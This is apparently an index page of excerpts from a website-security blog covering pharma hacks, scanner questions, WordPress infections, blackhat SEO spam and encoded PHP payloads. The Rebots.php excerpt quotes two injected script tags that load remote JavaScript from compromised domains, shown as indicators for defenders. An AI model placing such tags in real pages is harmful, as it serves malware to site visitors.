If you’re a WordPress user, love our free SiteCheck scanner, or already use our free SiteCheck Malware Scanner Plugin for WordPress, we have an update for you.
Joomla Pharma Hack – Web Malware Removal
In my last SEO poisoning post I wrote about some really nasty conditional malware. In this one, we’re going to turn our attention back to the more common variation of the attack, and look at the Joomla CMS.

This variation will be the Pharma hack. As of late, it seems to be going on a rampage on a number of CMS applications and many of its characteristics are similar. The objective appears to be clear, though: find its way into Google’s search engine result pages (SERP).
While we can only speculate, the idea is simple: the SERPs are a cached product, and as long as the attackers keep the injections free of malware, they increase their odds of bypassing detection until someone spots it and reports it.
Ask Sucuri: How does SiteCheck work?
If you have any questions about malware, blacklisting, or security in general, send them to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, go here.
Question: How does SiteCheck work? I just scanned a site that I think is compromised but the scanner is showing it as clean. Is my site really clean or did you make a mistake?
Answer: SiteCheck is our free, remote website scanner that works to identify if the provided site is infected with any type of malware (including SPAM) or if it’s been blacklisted or defaced.
Dealing with WordPress Malware
A few months back I contributed to a post with Smashing Magazine on the top 4 WordPress Infections. It was released yesterday, and it couldn’t have been at a better time. If anyone attended WordCamp Las Vegas, you might even find some similarities. Fortunately, in the process of preparing for the event and working with the team, we were able to compile a bit more information expanding on the things we originally discussed in the last post. It’s perfect timing for a number of reasons, and will complement this post very nicely.

The idea of this post, like many in the past, is to outline and discuss this past weekend’s presentation. In the process, hopefully you take something away. Unfortunately, the presentation was capped off with a live attack and hack, and I won’t be able to include that in this post, but I promise it’s coming.
Note: If you plan to be at WordCamp Philadelphia 2012 you might be in for some treats, just saying. And if you don’t have it on the calendar, you should.
Rebots.php JavaScript Malware Being Actively Injected
Holy JavaScript malware, Batman! On August 11th we started seeing the Rebot JavaScript malware string injected on various websites. Since then, it has appeared more often, and has varied the way it’s being included on the infected sites.

When you visit a compromised site, it will attempt to load an additional JavaScript, like one of these:
<script src="http://lig-limp.com.br/rebots.php"..
<script src="http://chezbruna.com.br/imagens/rebots.php"..
SiteCheck – Got Blackhat SEO Spam Warning?
As of late it seems like we’re talking about a lot of SPAM related cases; this post will be no different.

Before you start, let me preface this by saying that clearing a Blackhat SEO Spam injection is probably the biggest PITA (Google It) infection there is. They constantly evolve, making them difficult to detect, and they employ both new and old techniques that, even after years, still prove to be annoying. This post will demonstrate one such case.
Website Cross-contamination: Blackhat SEO Spam Malware
We recently posted about Website Cross-Contamination, which we see quite a bit of in shared hosting environments. This post is a follow-up with a nice sample of an SEO Spam infection that uses multiple sites in a shared environment to push its campaign.
We received a clean up request from a customer who was clearly infected with Blackhat SEO Spam:
Conditional Redirect Malware Decoded – Eval base64_decode Example
I have this beautiful website and now there’s all this garbled code across all of my PHP files. What’s it do, and how did it get there?
This is a quick post to show you some encoded crud that can attack your site, and do some pretty bad stuff.
Encoded Payload – Eval( base64_decode)
Generally speaking, we see this type of payload dropped into PHP, HTML, and JavaScript files. They are typically dropped into an environment through a known vulnerability in outdated software. This isn’t the only entry point, but definitely the one we see the most.


Vote SPAM For President: New Election Tactics or Same Old Tricks?
The United States presidential campaign is going full force, and it’s been a doozy. We don’t typically get involved with political situations, short of cleaning some of the crazy defacements we see; this is an exception.
This election campaign has brought its typical bashing via commercials, the usual rhetoric we see in interviews, and even those cool vote for (plug in your favorite candidate) stickers. My personal favorite was the vice presidential debate which left me feeling like I was on the grade school playground making faces and sticking my tongue out at the resident bully.
Times have adapted a bit, and the tactics have changed along with the advancements in communications, and social interaction. Twitter discussions boasting crazy statistics, Facebook posts about how awesome each candidate is, all of these have even spawned interesting debate and discussion in my own social groups.
Apparently, the crazy and debatably bad tactics extend beyond the historical mediums into our lovely world of geek. I guess it was only a matter of time.
We have drummed up a couple of theories on how this happened; ultimately it’s up to you to decide. More on that at the end.